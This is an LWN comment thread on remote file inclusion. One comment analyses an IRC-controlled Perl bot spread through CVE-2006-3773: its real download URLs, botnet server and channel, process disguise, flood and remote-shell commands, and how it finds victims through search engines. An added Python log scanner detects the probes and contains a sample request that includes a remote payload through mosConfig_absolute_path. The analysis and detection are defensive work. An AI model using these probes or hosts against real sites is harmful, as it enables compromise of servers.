For the curious (but lazy)... cap.txt is CVE-2006-3773 exploit
Posted Oct 12, 2006 14:47 UTC (Thu) by samj (guest, #7135)
Parent article: Remote file inclusion vulnerabilities
http://webstorch.com/cap.txt downloads and executes http://webstorch.com/borek.txt, a perl daemon that looks like '/usr/local/apache/bin/httpd -DSSL' in process lists. It joins #save on bot-net.4irc.com using nick `whoami` followed by a random string of 7 alpha characters (eg www-dataabcdefg, nobodyabcdefg) and realname `uname -a` (eg Linux ownedbox 2.6.16-2-686 #1 Sat Jul 15 21:59:21 UTC 2006 i686 GNU/Linux), but only after receiving a 005 RPL_BOUNCE (presumably sent to prevent real clients connecting). If it receives 443 ERR_USERONCHANNEL it generates a new nick, just in case there was a clash. It then waits for commands including nick, eval, rsh, google, tcpflood, udpflood, httpflood, join and part.
Most are self explanatory, except the google command which searches altavista.com?!?! for something like '"Powered by SMF" com_smf site:xx' (where xx is a randomly selected ISO country code), the results of which will be called as 'http://victim.com/components/com_smf/smf.php?mosConfig_ab...'.
This is an exploit for http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3773
PHP remote file inclusion vulnerability in smf.php in the SMF-Forum 1.3.1.3 Bridge Component (com_smf) For Joomla! and Mambo 4.5.3+ allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
It would probably be fairly easy to clean up the affected machines but to do so would potentially land you in as much hot water as the original author.
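Detection logic for the probe pattern described in the comment above, written here as an added example (it is not samj's code nor anything from LWN): it parses Apache combined-format access log lines and flags requests whose query string carries the mosConfig_absolute_path parameter from CVE-2006-3773, or any parameter whose value is itself a remote URL. The log lines and the payload host are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format; only the client IP, request target and status
# are extracted, the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# The parameter named in the CVE-2006-3773 advisory, plus the generic
# remote-file-inclusion sign: a parameter value that is a remote URL.
SUSPECT_PARAMS = {"mosconfig_absolute_path"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def classify_request(target):
    """Return (param, value) for the first suspicious query parameter, else None."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so http%3A%2F%2F... becomes http://...
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        lowered = value.strip().lower()
        if name.lower() in SUSPECT_PARAMS or lowered.startswith(REMOTE_SCHEMES):
            return name, value
    return None


def find_rfi_attempts(lines):
    """Scan log lines and return one record per request that looks like an RFI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        found = classify_request(m.group("target"))
        if found:
            hits.append({"ip": m.group("ip"), "param": found[0],
                         "value": found[1], "status": int(m.group("status"))})
    return hits


# Constructed sample lines (not real traffic). The first mimics the probe
# shape described above with a placeholder host standing in for the payload URL.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Oct/2006:14:02:11 +0000] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http%3A%2F%2Fpayload.example%2Fcap.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [12/Oct/2006:14:02:15 +0000] "GET /index.php?option=com_smf&Itemid=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Oct/2006:14:02:20 +0000] "GET /index.php?page=ftp://payload.example/x.txt HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 on the smf.php probe is the line worth chasing first, since the remote file was likely fetched and executed rather than rejected.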
Posted Oct 12, 2006 17:53 UTC (Thu) by frazier (guest, #3060)
I use SMF standalone (no Joomla) and was wondering how this exploit worked.
Using search engines to find message boards for evil is common. I get an average of 3+ fake member registrations a day. The exploit here is simple: Post spam on the message board. For about 3 years I had my board to where anyone could post without approval, but in the last 6 months it escalated to the point of stupidity, so now I have to approve people. A shame.
Here's one of many spammed over boards out there (there's some sex spam on there along with insurance, gambling, drugs, and more):
http://wrfl881.org/forum/viewtopic.php?t=123&postdays...
That's page 1932, and all the spam on that (and some other pages) was added today.
That poor board has been drilled. It is linked directly from their home page:
http://wrfl881.org/
-Brock
Posted Feb 10, 2010 4:01 UTC (Wed) by Steve1980 (guest, #63466)
Thanks for the breakdown on this.